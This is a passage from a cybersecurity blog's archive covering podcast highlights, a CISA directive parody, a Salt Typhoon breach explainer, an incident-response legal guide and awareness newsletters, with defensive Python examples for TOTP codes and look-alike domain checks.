Our relaunch episode kicked off the year by outlining an exciting new direction for Exploring Information Security. I’m shocked that this came out on top but there seemed to be some excitement at the return of the podcast. Which I’m very appreciative of and makes me want to kick myself for not bringing the podcast back sooner.
Listen Here: Exploring Information Security 2024 Relaunch

2. What Cybersecurity Tools Every Organization Should Have

  • Release Date: February 27, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller shared insights into the essential tools that every organization should have to secure their digital infrastructure. The episode covered endpoint protection, threat intelligence platforms, and emerging technologies that simplify security operations. This was the result of a discussion we had during another podcast recording. I thought it was a great discussion to turn into its own topic.
Listen Here: What Cybersecurity Tools Every Organization Should Have

3. How to Hack a Satellite

  • Release Date: January 23, 2024

  • Guest: Tim Fowler

Key Highlights:
Tim Fowler took listeners on a deep dive into the vulnerabilities and challenges of securing space technology. From real-world case studies of satellite hacks to strategies for defense, this episode offered a unique and fascinating perspective on the intersection of cybersecurity and aerospace. This will continue to grow as a new field for cybersecurity, very similar to how cloud security, identity and access management, and AI have become their own fields. And as usual we’re already behind on security…
Listen Here: How to Hack a Satellite

4. What Are the Hiring Trends in Cybersecurity for 2024?

  • Release Date: January 16, 2024

  • Guest: Erin Barry

Key Highlights:
In this insightful episode, Erin Barry analyzed the latest hiring trends in cybersecurity heading into 2024. The conversation touched on the growing demand for professionals with cloud and AI expertise, the importance of soft skills, and tips for breaking into the field. A must-listen for job seekers and industry leaders. This is a podcast I’d like to make a staple for the new year because it did seem to be a popular topic.
Listen Here: What Are the Hiring Trends in Cybersecurity for 2024?

5. How to Navigate a Career in Cybersecurity

  • Release Date: August 13, 2024

  • Guest: Ralph Collum

Key Highlights:
Ralph Collum shared his journey from entry-level roles to executive leadership in cybersecurity. The discussion covered mentorship, certifications, and strategies for navigating career plateaus. I always enjoy talking to Ralph. He’s very passionate about developing careers in Cybersecurity. It makes sense that this one would follow the hiring trends for 2024. I expect that with the current hiring market job seeking and career podcast episodes will remain popular.
Listen Here: How to Navigate a Career in Cybersecurity

6. How AI Is Impacting Cybersecurity

  • Release Date: July 30, 2024

  • Guest: Steve Orrin

Key Highlights:
Steve Orrin explored the dual role of artificial intelligence in cybersecurity, highlighting its use in threat detection and the ethical concerns it raises. The episode featured real-world examples of AI-driven security solutions and debated the future of automation in the industry. I really enjoyed this conversation with Steve because he’s not only an executive but someone who also attends DEF CON on a regular basis. He traverses both worlds well and has a very intelligent take on key topics in cybersecurity.
Listen Here: How AI Is Impacting Cybersecurity

7. How Responding to Phishing Has Changed in the Last 5 Years

  • Release Date: January 30, 2024

  • Guest: Kyle Andrus

Key Highlights:
Kyle Andrus and I discussed how phishing has changed since I last had him on the podcast. I always enjoy having Kyle on because we always have a good conversation. In fact he and I have had a couple of recording sessions at this point on other topics because we always end up talking about something else. I’ve got another recording session scheduled with him for early 2025 to talk about ransomware gangs.
Listen Here: How Responding to Phishing Has Changed in the Last 5 Years

8. How to Automate Information Security with Python

  • Release Date: July 23, 2024

  • Guest: Mark Baggett

Key Highlights:
Mark Baggett broke down the ways Python is revolutionizing cybersecurity automation. From simplifying vulnerability scanning to streamlining log analysis, this episode was packed with actionable insights for security professionals looking to enhance their workflows. Mark is the Python guru for Cybersecurity. He’s written an entire SANS class on it and he’s been talking about Python ever since I’ve been in the industry.
Listen Here: How to Automate Information Security with Python

9. What Is Mimikatz?

  • Release Date: February 6, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller delivered an in-depth look at Mimikatz, a powerful tool often used in penetration testing and malicious attacks. He explained its functionality, provided examples of its use, and discussed the countermeasures security teams can implement to defend against it. I’ve dubbed Rob the Hacker Historian because of his wealth of knowledge in hacking. He made the Top 10 list three times this year and was also in the RERELEASE of the episode on the MS08-067 vulnerability.
Listen Here: What Is Mimikatz?

10. How Worrying Is SIM Swapping in 2024?

  • Release Date: August 6, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller returned to discuss the NOT SO alarming rise of SIM swapping attacks in 2024. This was based on a LinkedIn post he made on SIM Swapping that got quite a bit of commentary. I thought it was a great discussion and would make for an interesting episode. Surprise! It was a great conversation and people seemed to engage with the podcast episode. These are the kind of episodes I want to have that challenge some of the norms within Cybersecurity.
Listen Here: How Worrying Is SIM Swapping in 2024?

Honorable Mentions

Two of the people I always wanted to have on the podcast but was too scared to ask prior to shutting down the podcast were Troy Hunt and Patrick Gray. Both have helped me navigate and shape my career in cybersecurity, and I was happy that both agreed to come on. Both were absolutely amazing people to have a conversation with.

What is Have I Been Pwned?

The Origins of Risky Business with Patrick Gray

Finally, Dave Chronister has been a huge supporter of the show and a wonderful friend. He also runs a phenomenal conference called ShowMeCon (early-bird tickets available now!)! He’s always a joy to have on the show but this past year he sponsored several episodes and I had a lot of great conversations with presenters from the conference. I have probably never laughed more than I did talking to Kevin Johnson about whatever was on his mind. Also, I really enjoyed the panel we did at ShowMeCon. Unfortunately, I forgot to hit the record button and thus entered the mythical status as a podcast that only those present got to enjoy.

ShowMeCon: Kevin Johnson and whatever he wants to talk about

Final Thoughts

As always, I’m grateful to the listeners of the show. I don’t hear from a lot of them but based on the numbers and engagement they’re out there. I’m also super grateful to all the guests that have come on the show to share their insights and knowledge. I am looking forward to another great year of conversations with amazing guests!

What were your favorite episodes in 2024?

In Media, Website Tags Podcast, Top 10, Cybersecurity
Comment

Created with ChatGPT

Introducing the CISA Angry Translator Series

December 23, 2024

Today, we’re launching something new: the CISA Angry Translator Series. This idea came from a blog post by Brian Dye over at Corelight. CISA has been releasing more and more advisories and directives. There are certain themes from these releases that just aren’t hitting home. Enter the Angry Translator whom I’ve dubbed Frank. He’s here to say what CISA really wants to say but can’t.

This idea is a parody of the very funny Key & Peele sketch in which Obama gets an Angry Translator called Luther. It was so popular that Keegan-Michael Key joined President Obama on stage for the 2015 White House Correspondents’ Dinner.

Below is what you can expect from the series. I’ve used ChatGPT to create the initial draft and made edits where necessary. Make sure to check out Brian’s post and Corelight. I’ve got an upcoming podcast with Brian talking about Corelight and I really like what they’re doing.

CISA's Angry Translator: Cloud Security Directive

CISA Directive: https://www.cisa.gov/news-events/directives/bod-25-01-implementing-secure-practices-cloud-services

CISA Says:
"Federal agencies must implement secure practices for cloud services to safeguard federal information and information systems."

Frank:
"Hey, government folks! Your cloud setups are a hacker's playground right now. Lock them down before you hand over our data on a silver platter!"

CISA Says:
"Recent cybersecurity incidents highlight the significant risks posed by misconfigurations and weak security controls."

Frank:
"Translation: Your sloppy setups are like leaving your front door wide open with a 'Welcome Hackers' sign. Fix it before we all pay the price!"

CISA Says:
"Agencies are required to identify specific cloud tenants, implement assessment tools, and align cloud environments to CISA’s Secure Cloud Business Applications (SCuBA) secure configuration baselines."

Frank:
"Step 1: Know what cloud stuff you have. Step 2: Use the tools we've given you to check them. Step 3: Follow the dang security guidelines! It's not rocket science, people!"

CISA Says:
"Implement all mandatory SCuBA policies effective as of this Directive’s issuance no later than June 20, 2025."

Frank:
"You've got until June 20, 2025, to get your act together. That's more than enough time to stop being a cybersecurity dumpster fire!"

CISA Says:
"Maintaining secure configuration baselines is critical in the dynamic cybersecurity landscape."

Frank:
"The cyber threats are evolving, and your security should too. Keep up, or get left behind—and hacked!"

CISA Says:
"This Directive will further reduce the attack surface of the federal government networks."

Frank:
"We're trying to make it harder for the bad guys to mess with us. Help us help you, help us help you, help us help you!"

Final Note from Frank:
"Look, securing your cloud services isn't optional—it's your job. Stop dragging your feet, follow the directive, and let's not end up on the front page for a massive data breach. Get it together, now!"

In News Tags CISA, Angry Translator, cloud security, cloud
Comment

Created by ChatGPT

Breakdown of Events: Salt Typhoon Hacking Group Targets U.S. Telecommunications

December 17, 2024

Introduction: The Growing Threat of Salt Typhoon

The Chinese cyber espionage group known as Salt Typhoon has successfully breached several major U.S. telecommunications companies. This breach has raised alarms across government agencies, resulting in calls for the sector to bolster its cybersecurity measures. It’s also become big enough news that I have my family talking to me about it. As I prepare for a holiday get together with the family I decided to put together this breakdown of the events surrounding this discovery and the subsequent response from U.S. authorities and the federal government. Hopefully, this will help others get up to speed and join the family conversation around Salt Typhoon.

The Salt Typhoon Cyberattack: What We Know So Far

Salt Typhoon has infiltrated at least eight prominent U.S. telecom companies, including AT&T, Verizon, and T-Mobile. The group has targeted not just corporate entities but also high-profile government and political figures, potentially compromising metadata and, in some cases, the content of sensitive communications. The scope of this breach is vast, and experts are concerned about the broader implications for national security.

What Did Salt Typhoon Specifically Access?

The hackers accessed critical infrastructure within these companies, focusing on:

  • Metadata: They collected data on who was communicating with whom, when, and where.

  • Communication Content: In some cases, they accessed the actual content of communications, including emails and messages.

  • Internal Systems: Salt Typhoon exploited vulnerabilities to infiltrate internal company networks, potentially compromising systems used to manage communication between telecommunications providers and government agencies.


Source: Salt Typhoon Hackers Infiltrate U.S. Telecoms - AP News

What are the ramifications of the access?

National Security Threats

Since telecommunications systems are integral to the functioning of government communications and defense operations, unauthorized access by a foreign state-sponsored group could compromise national security. The breach could lead to:

  • Espionage: Sensitive government communications, including classified information, could be intercepted, analyzed, and used for strategic advantage by foreign actors.

    • Informant Identification: The threat actors could learn which individuals the U.S. government has identified as Chinese or other nation-state spies. That knowledge is invaluable to the adversary: it lets them feed false information through an exposed spy, or pull that person out of the U.S. before they are caught.

  • Undermining Military Operations: If Salt Typhoon gained access to military communication channels, it could disrupt or manipulate defense strategies, communications, and troop movements, potentially weakening national defense readiness.

  • Supply Chain Vulnerabilities: The telecom infrastructure is tied to critical sectors like defense, finance, and healthcare. By compromising telecom networks, the attackers could infiltrate other critical industries, creating cascading vulnerabilities.

Corporate Espionage

Telecommunications companies manage massive amounts of sensitive corporate data, including contracts, communication, and internal systems used by businesses across industries. Salt Typhoon's access to telecom infrastructure could enable:

  • Exfiltration of Trade Secrets: By obtaining private communications and proprietary data, the hackers could gain valuable insight into corporate strategies, product development, and future business decisions.

  • Targeting High-Profile Executives and Clients: The hacking group could gather intelligence on key executives and high-profile clients, leading to targeted phishing campaigns, blackmail, or leveraging this information for financial gain or competitive advantage.

Personal Privacy Concerns

Telecommunications companies manage vast amounts of personal data, including call records, text messages, location data, and internet usage patterns. The implications for personal privacy are significant:

  • Identity Theft: With access to sensitive personal information, Salt Typhoon could facilitate identity theft by harvesting personally identifiable information (PII) or leveraging it for future cybercrimes.

  • Surveillance: The hackers could track individuals of interest, monitoring their communications or movements, potentially leading to political repression, blackmail, or surveillance of dissidents.

  • Erosion of Trust: If customers' private data were exposed, it could result in a loss of trust in telecom providers, eroding the public's confidence in their ability to protect sensitive personal information.

Disruption to Communication Networks

Given that telecommunications are critical to day-to-day operations in both the private and public sectors, the breach could lead to:

  • Service Interruptions: Salt Typhoon could potentially manipulate telecom networks to disrupt services or cause widespread outages, impacting businesses, emergency services, and government operations.

  • Manipulation of Communications: The group could inject false information into the communication system, manipulate messages, or redirect communications to unauthorized entities, undermining the integrity of telecom networks.

Escalation of Cybersecurity Threats

This breach highlights vulnerabilities within the telecommunications infrastructure, which could inspire further cyberattacks. Other threat actors might exploit similar weaknesses, leading to:

  • Copycat Attacks: Other state-sponsored groups or cybercriminals may attempt to replicate or build upon Salt Typhoon's methods, targeting the same or other telecom providers with different attack vectors.

  • Increased Cybercrime: Hackers might use access to telecom networks to launch further cyberattacks, such as distributed denial-of-service (DDoS) attacks, ransomware campaigns, or data exfiltration operations.

Diplomatic and Geopolitical Fallout

If it is conclusively proven that Salt Typhoon is backed by the Chinese government, this breach could have far-reaching diplomatic consequences:

  • Strained Relations: The U.S. government could take retaliatory actions, including sanctions or other diplomatic measures, further exacerbating tensions between the U.S. and China.

  • International Repercussions: Other countries, particularly U.S. allies, may also reconsider their engagement with Chinese telecom equipment providers, leading to a shift in global trade and technology alliances.

Government Response: A Wake-up Call for Telecoms

In response to this alarming breach, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued joint guidance urging telecom companies to enhance their security measures. Their recommendations include adopting stronger data encryption, centralizing security systems, and establishing continuous threat monitoring to prevent future attacks.

Source: FBI and DHS Issue Cybersecurity Alert on Telecom Sector - CISA

The FCC’s Role: Proposing New Rules to Strengthen Telecom Security

To address the growing cybersecurity risks, the Federal Communications Commission (FCC) has proposed new rules requiring telecom companies to submit annual certifications attesting to their compliance with updated security protocols. The FCC’s proposals aim to ensure telecom firms take proactive steps to defend against cyber threats. Penalties for non-compliance could follow, emphasizing the importance of safeguarding communication channels.

Sources: FCC Proposes New Cybersecurity Rules for Telecoms - DarkReading; FCC to Demand Telcos Improve Security - Seriously Risky Business

Federal Government Calls for Immediate Action

U.S. Senators have expressed grave concern over the scale of the Salt Typhoon attack. Senator Ben Ray Lujan described the breach as "possibly the largest telecommunications hack in American history," calling for swift government action to improve security within the telecom sector.

Source: Senators Warn the Pentagon: Get a Handle on China's Telecom Hacking - Wired

Encrypted Communication Platforms: A Safer Alternative for Users

As an additional safeguard, individuals are encouraged to use end-to-end encrypted messaging platforms such as WhatsApp or Signal. SMS travels and is stored in the clear on the carrier’s network, so anyone with the kind of access Salt Typhoon obtained can read it; end-to-end encrypted messages cross the same networks as ciphertext that only the two endpoints can decrypt, which makes them a far more secure means of communication in the wake of these breaches.

Source: FBI Warns iPhone and Android Users: Stop Sending Texts - Forbes

The Response from China: Denial of Involvement

Despite mounting evidence of Salt Typhoon’s activities, the Chinese government has denied any involvement in the cyberattacks. They label the allegations as disinformation, rejecting any claims of their participation in the hacking group’s operations.

Source: White House says at least 8 US telecom firms, dozens of nations impacted by China hacking campaign - AP News

Conclusion: The Urgency for Change

The Salt Typhoon cyberattack has exposed critical vulnerabilities in U.S. telecommunications infrastructure. With federal agencies and lawmakers calling for immediate action, it is essential that telecom providers take comprehensive measures to protect sensitive communications and prevent future breaches. As the government and telecom companies work toward stronger security practices, it’s clear that the stakes have never been higher.

What Individuals Can Do

While the breach highlights systemic issues within telecom security, individuals can also take steps to protect their personal information and limit the impact of such cyberattacks. Using end-to-end encrypted platforms like Signal or WhatsApp for sensitive conversations adds a layer of protection against surveillance or interception at the carrier. Individuals should also move away from SMS-based one-time codes for logging in to accounts: a code sent by text is only as private as the carrier network it crosses. This isn’t always possible, but more and more services offer app-based authentication such as Google Authenticator, Duo, or a similar mobile application, where the code is generated on the device and never travels over the telecom network. By taking these precautions, individuals can reduce their personal exposure to cyber threats and enhance their overall online security.
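The paragraph above recommends replacing SMS codes with an authenticator app. As an added example (not code from the original post), the Python below implements the TOTP algorithm (RFC 6238) that those apps use, together with the server-side check, to show why the code never has to cross the carrier’s network: it is computed on the device from a shared secret and the clock. The secret is the RFC 6238 test value, not a real credential, and `used_counters` is an assumed in-memory stand-in for the per-user state a real service would persist.

```python
"""TOTP (RFC 6238) as used by authenticator apps, with a server-side verifier.

Added example, not code from the original post. The secret is the RFC 6238
test secret, not a real credential; `used_counters` stands in for per-user
server state that a real deployment would persist.
"""
import hashlib
import hmac
import struct
import time
from typing import Optional, Set

# RFC 4226 / RFC 6238 test secret (ASCII "12345678901234567890"). A real
# enrollment generates a random secret and shares it once, e.g. via QR code.
TEST_SECRET = b"12345678901234567890"
STEP_SECONDS = 30
DIGITS = 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at_time: Optional[int] = None,
         step: int = STEP_SECONDS, digits: int = DIGITS) -> str:
    """RFC 6238 TOTP: HOTP with the counter = number of `step`-second intervals since the epoch.

    This is all the authenticator app does; nothing is sent to or received from the carrier.
    """
    if at_time is None:
        at_time = int(time.time())
    return hotp(secret, at_time // step, digits)


def verify_totp(secret: bytes, candidate: str, at_time: int, used_counters: Set[int],
                window: int = 1, step: int = STEP_SECONDS) -> bool:
    """Server-side check for a submitted code.

    Accepts the current time step and `window` steps on either side (clock skew),
    compares in constant time, and refuses a step that already succeeded so a code
    phished in real time cannot be replayed within its validity window.
    """
    current = at_time // step
    for counter in range(current - window, current + window + 1):
        if counter in used_counters:
            continue
        if hmac.compare_digest(hotp(secret, counter), candidate):
            used_counters.add(counter)
            return True
    return False


if __name__ == "__main__":
    # RFC 6238 vector: at T=59 the SHA-1 code is 94287082, so six digits -> 287082.
    print(totp(TEST_SECRET, at_time=59))
    seen: Set[int] = set()
    print(verify_totp(TEST_SECRET, "287082", at_time=59, used_counters=seen))  # True
    print(verify_totp(TEST_SECRET, "287082", at_time=59, used_counters=seen))  # False, replay
```

The takeaway for the reader: an attacker with Salt Typhoon’s reach into a carrier can read every one-time code delivered by SMS, but gains nothing here, because the only value that ever leaves the device is the short-lived code typed into the login form. Real-time phishing relays remain a risk for any code-based method, which is why the verifier above refuses to accept the same time step twice.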

Sources:

  1. Salt Typhoon Hackers Infiltrate U.S. Telecoms - AP News

  2. FBI and DHS Issue Cybersecurity Alert on Telecom Sector - CISA

  3. FCC Proposes New Cybersecurity Rules for Telecoms - DarkReading

  4. FCC to Demand Telcos Improve Security - Seriously Risky Business

  5. Senators Warn the Pentagon: Get a Handle on China's Telecom Hacking - Wired

  6. Senators Say U.S. Must Boost Security After Chinese Salt Typhoon Telecom Hacking - Reuters

  7. FBI Warns iPhone and Android Users: Stop Sending Texts - Forbes

  8. White House says at least 8 US telecom firms, dozens of nations impacted by China hacking campaign - AP News

Created with help from ChatGPT

In News Tags Salt Typhoon, Telecommunications, Hacking, Nation State
Comment

Avoiding Legal Landmines in Incident Response: A Practical Guide for Security Teams

December 10, 2024

The information provided in this blog post does not, and is not intended to, constitute legal advice; rather, the ensuing conversation is for general informational purposes only.

In today’s cybersecurity landscape, responding swiftly and effectively to security incidents is critical. However, navigating the legal implications during an incident is equally vital to protect an organization from further liabilities. This guide covers essential strategies for avoiding the most common legal pitfalls in incident response (IR), based on insights from my recent podcast episode with cybersecurity attorney Thomas Ritter Exploring Legal Landmines in Incident Response.

Use Careful Terminology: “Incident” vs. “Breach”

When a security event occurs, the language you use to describe it can have significant legal implications. Terms like “breach” have specific legal definitions that can trigger mandatory notification requirements or other regulatory obligations. As a best practice, use neutral terms like “incident” until the situation is fully assessed by legal counsel.

  • Tip: Train your teams on preferred terminology and involve legal early in the process to make sure everyone understands when and how to escalate terms like “breach.”

Establish Attorney-Client Privilege Early

Engaging external counsel immediately after a security incident helps protect sensitive communications and investigative findings under attorney-client privilege. This protection is crucial should your organization face litigation, as it limits the exposure of certain communications during the discovery process.

  • Tip: Collaborate with your legal team to establish protocols for involving external counsel, even for minor incidents, to ensure privilege is in place if needed.

Refine Your Communication Strategy

Transparency is key during incident response, but be cautious with internal and external communications, especially in the early stages. Avoid speculative statements and keep communications brief until forensic findings provide a clearer picture.

  • Tip: Work with your legal and PR teams to develop standardized communications templates for different scenarios, ensuring clarity and consistency without compromising on accuracy.

Define Roles and Responsibilities in Your IR Plan

Many incident response plans (IRPs) lack a clear delineation of responsibilities, particularly regarding who determines when an incident becomes a breach. Ideally, legal counsel—preferably external—should make this determination to preserve objectivity and privilege.

  • Tip: Review your IRP to ensure that roles and escalation points are well defined, with legal counsel involved at key decision points.

Handle Ransomware Negotiations Carefully

Ransomware incidents often involve complex decisions about whether to engage with or pay threat actors. Professional negotiators can play a valuable role here, as they are well-versed in handling threat actor communications and negotiating terms without compromising your organization’s legal standing.

  • Tip: Always hire professionals for ransomware negotiations. Amateur negotiators risk mishandling sensitive communications, which can exacerbate both financial and reputational damage.

Prepare for Possible Class Action Litigation

In the event of a data breach, it’s increasingly common for affected parties to file class action lawsuits. Many legal teams recommend proactive measures to limit liability, such as documented protocols that show your team acted swiftly and responsibly during the incident.

  • Tip: Ensure your IR documentation is thorough and compliant with industry standards, as this can provide valuable evidence should litigation arise.

Use Tabletop Exercises to Strengthen Incident Preparedness

Incident response tabletop exercises, especially those involving executive teams, help prepare your organization to navigate both operational and legal complexities in a crisis. In addition to familiarizing staff with the IRP, tabletop exercises offer an opportunity to practice coordination with legal counsel, PR, and executive stakeholders.

  • Tip: Schedule annual or biannual tabletop exercises that simulate high-stakes incidents, like ransomware attacks, to ensure all teams are familiar with legal protocols.

Conclusion: A Proactive Legal Strategy in Incident Response

Responding to a security incident without considering legal implications can expose your organization to additional risks. By carefully navigating language, establishing attorney-client privilege, and preparing staff with tabletop exercises, your organization can avoid many of the legal pitfalls associated with incident response. Whether preparing for regulatory inquiries or class action lawsuits, these best practices can help your organization respond to incidents effectively and with minimized legal exposure.

In Advice Tags Legal, Incident Response
Comment

Created by ChatGPT

December 2024 - Healthcare Executive Leadership Cybersecurity Newsletter

December 9, 2024

These are the stories I shared internally with my leadership. Feel free to take and use for your own leadership. Created with help from ChatGPT.

New Professional Liability Insurance for CISOs 

In response to the increasing legal scrutiny faced by Chief Information Security Officers (CISOs), Crum & Forster has introduced a professional liability insurance policy tailored specifically for these executives. Traditionally, directors and officers (D&O) liability policies have not encompassed CISOs, leaving them vulnerable to personal financial risks in the event of cybersecurity incidents. 

Key Features of the Policy: 

  • Comprehensive Coverage: Protects against claims of negligence or inadequate work arising from cybersecurity services. 

  • Flexible Acquisition: Available for purchase by organizations on behalf of their CISOs or directly by the CISOs themselves. 

  • Extended Protection: Covers consulting activities for the organization and its subsidiaries, as well as external engagements, including pro bono IT security work. 

Further Reading: CyberScoop Article 


Bipartisan Effort to Enhance Healthcare Cybersecurity 

On November 22, 2024, Senators Bill Cassidy (R-LA), Mark Warner (D-VA), John Cornyn (R-TX), and Maggie Hassan (D-NH) introduced the Health Care Cybersecurity and Resiliency Act of 2024. This bipartisan legislation aims to bolster cybersecurity measures within the healthcare sector, addressing the increasing threats to patient data and healthcare operations.  


Key Provisions: 

  • Grant Funding: Allocates resources to healthcare entities for enhancing cyberattack prevention and response capabilities. 

  • Training Initiatives: Provides cybersecurity best practices training to healthcare institutions. 

  • Support for Rural Providers: Offers tailored guidance to rural health clinics on breach prevention and resilience strategies. 

  • Interagency Coordination: Improves collaboration between the Department of Health and Human Services (HHS) and the Cybersecurity and Infrastructure Security Agency (CISA) for effective cyberattack responses. 

  • Regulatory Modernization: Updates Health Insurance Portability and Accountability Act (HIPAA) regulations to incorporate current cybersecurity best practices. 

  • Incident Response Planning: Mandates the development and implementation of a cybersecurity incident response plan by the HHS Secretary. 

Implications for Healthcare Organizations: This legislation underscores the critical need for robust cybersecurity frameworks within healthcare institutions. Executive leaders should proactively assess their organization's cybersecurity posture, ensuring alignment with emerging standards and readiness to leverage potential federal support. Embracing these initiatives will not only protect sensitive patient information but also enhance operational resilience against cyber threats. 

Further Reading: Senate HELP Committee Press Release 


In News Tags Newsletter, Executive Leadership, Healthcare
Comment

Created by ChatGPT

December 2024 - Security Awareness Newsletter

December 6, 2024

This is a security awareness focused newsletter that I share internally. Feel free to grab and use for your own internal security awareness program.

Copyright Infringement Phishing Scams Targeting Facebook Business Users 

Cybercriminals are targeting Facebook business and advertising account users, especially in regions like Taiwan, with phishing emails that falsely claim copyright infringement. These emails urge recipients to download a file (disguised as a PDF), which actually installs information-stealing malware on the victim’s device. This tactic aims to harvest sensitive information from users who trust the email’s legal-sounding message. 

Key Points: 

  • Target Audience: Facebook business and advertising account users. 

  • Phishing Tactic: Emails posing as copyright infringement notices. 

  • Malware Delivery: Malicious files masquerading as PDFs that contain infostealers. 

Further Reading: Cisco Talos Report on Copyright Infringement Phishing Lure 


Beware of 'Phish 'n' Ships': Fake Online Stores Stealing Your Money and Data 

Cybercriminals are increasingly creating fraudulent online shops that mimic legitimate retailers to deceive consumers into providing payment information and personal data. These fake websites often offer enticing deals on popular products, luring unsuspecting shoppers into making purchases. Once payment details are entered, the scammers steal the information, leading to financial loss and potential identity theft. 

How to Protect Yourself: 

  • Verify Website Authenticity: Before making a purchase, ensure the website is legitimate by checking the URL for misspellings or unusual domain extensions. 

  • Look for Secure Connections: Ensure the website uses HTTPS, but know what that proves. The padlock only means traffic to the site is encrypted; it says nothing about who runs the site, and most fraudulent stores use HTTPS too. Treat a missing padlock as a reason to leave, never its presence as proof the store is real. 

  • Research the Seller: Look for reviews and ratings from other customers to confirm the retailer's credibility. 

  • Be Cautious of Unrealistic Deals: If an offer seems too good to be true, it likely is. 

Further Reading: Human Security 
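The first tip above tells readers to check the URL for misspellings or unusual domain extensions. As an added example (not code from the original newsletter), the Python below performs that check mechanically against a constructed allow-list of two hypothetical store domains: it folds common look-alike characters, measures edit distance to each trusted name, and flags a brand name hiding in a subdomain or under a different TLD. The sample URLs are constructed, and the registrable-domain logic is a simplification noted in the code.

```python
"""Flag store URLs whose domain resembles, but is not, a trusted retailer.

Added example, not from the original newsletter. TRUSTED_DOMAINS and the URLs
in the demo are constructed; the two store names are hypothetical.
"""
from typing import Iterable, Tuple
from urllib.parse import urlsplit

# Constructed allow-list of registrable domains the organisation trusts.
TRUSTED_DOMAINS = {"examplemart.com", "shopexample.com"}

# Single characters commonly swapped for look-alikes, folded to one canonical letter.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b", "9": "g"})
# Multi-character look-alikes ("rn" reads as "m", "vv" as "w", "cl" as "d").
MULTI_CHAR = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalize(label: str) -> str:
    """Fold look-alike characters so 'exarnp1e' and 'example' compare equal."""
    label = label.lower().translate(CONFUSABLES)
    for bad, good in MULTI_CHAR:
        label = label.replace(bad, good)
    return label


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Simplification: a real tool should consult the
    Public Suffix List so that names under e.g. '.co.uk' are handled correctly."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_url(url: str, trusted: Iterable[str] = TRUSTED_DOMAINS) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is 'trusted', 'suspicious' or 'unknown'."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    domain = registrable_domain(host)
    if domain in trusted:
        return "trusted", f"{domain} is on the allow-list"
    label = normalize(domain.split(".")[0])
    for good in trusted:
        raw_label = good.split(".")[0]
        good_label = normalize(raw_label)
        # 1. Brand spelled out as a subdomain of someone else's domain:
        #    examplemart.com.deals-today.shop
        prefix = host[: -len(domain) - 1] if host != domain else ""
        if raw_label in prefix.split("."):
            return "suspicious", f"{good} appears as a subdomain of {domain}"
        # 2. Same brand label after confusable folding, but a different domain
        #    (wrong TLD or look-alike characters): examplemart.shop, exarnplemart.com
        if label == good_label:
            return "suspicious", f"{domain} mimics {good}"
        # 3. Typosquat: within a small edit distance of the brand label.
        if edit_distance(label, good_label) <= (1 if len(good_label) < 8 else 2):
            return "suspicious", f"{domain} is within typo distance of {good}"
    return "unknown", f"{domain} is not on the allow-list and resembles no trusted brand"


if __name__ == "__main__":
    # Constructed sample URLs covering each verdict.
    for sample in ("https://www.examplemart.com/deals",
                   "https://examplemart.com.deals-today.shop/checkout",
                   "https://exarnplemart.com/",
                   "https://exampelmart.com/",
                   "https://totally-different.org/"):
        print(sample, "->", assess_url(sample))
```

An "unknown" verdict is not a clean bill of health; it only means the name does not resemble a brand on the list, so the remaining tips (researching the seller, distrusting unrealistic deals) still apply.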


Beware of DocuSign-Inspired Invoice Scams 

Cybercriminals are leveraging DocuSign’s Envelopes API to distribute highly realistic fake invoices impersonating trusted brands like Norton and PayPal. These malicious emails come from legitimate DocuSign domains, bypassing security filters and appearing authentic. Attackers aim to have recipients e-sign the document, which can authorize unauthorized payments. 

What You Can Do: 

  • Always verify invoice details directly with the company rather than clicking links within emails. 

  • Look out for unexpected requests, even from trusted services. 

  • Educate your team about this tactic and report suspicious invoices immediately. 

Further Reading: Bleeping Computer 


Mobile Ad Data Enables Widespread Surveillance 

Recent investigations reveal that commercial services are exploiting mobile advertising data to track individuals' daily movements without their consent. By collecting data from widely-used mobile apps and websites, these services can monitor personal locations, posing significant privacy risks. 

Protect Your Privacy: 

  • Limit App Permissions: Only grant apps the permissions they genuinely need. 

  • Review Privacy Settings: Regularly check and adjust your device's privacy settings to control data sharing. 

  • Stay Informed: Be aware of how your data is collected and used by the apps and services you utilize. 

Further Reading: Krebs on Security

Phishing Scams Targeting Booking.com Users 

Recent reports highlight a surge in phishing attacks exploiting Booking.com accounts. Cybercriminals are compromising hotel partner accounts to access customer booking details, subsequently sending fraudulent messages that appear legitimate. These messages often request additional information or payments, aiming to deceive users into providing sensitive data or transferring funds. 

Protect Yourself: 

  • Verify Communications: Always confirm the authenticity of messages by contacting the hotel or Booking.com directly through official channels. 

  • Avoid Unsolicited Links: Do not click on links or download attachments from unexpected emails or messages. 

  • Enable Two-Factor Authentication (2FA): Activate 2FA on your Booking.com account to add an extra layer of security. 

Further Reading: Krebs on Security

North Korean IT Workers Infiltrating Western Companies 

Recent investigations have uncovered a concerning trend: North Korean IT professionals are securing remote positions in Western companies, including those in the United States, by using stolen identities and sophisticated social engineering tactics. This strategy enables them to bypass international sanctions and funnel earnings back to North Korea, potentially funding illicit activities. 

Key Insights: 

  • Identity Theft: These individuals often use stolen or fabricated identities to pose as qualified candidates from various countries. 

  • Advanced Techniques: They employ generative AI tools to craft convincing resumes and perform well in interviews, making detection challenging. 

  • Financial Implications: Earnings from these positions are redirected to support North Korea's sanctioned programs, including its weapons development initiatives. 

Further Reading: Zscaler Security Research

Surge in Eventbrite-Based Phishing Attacks 

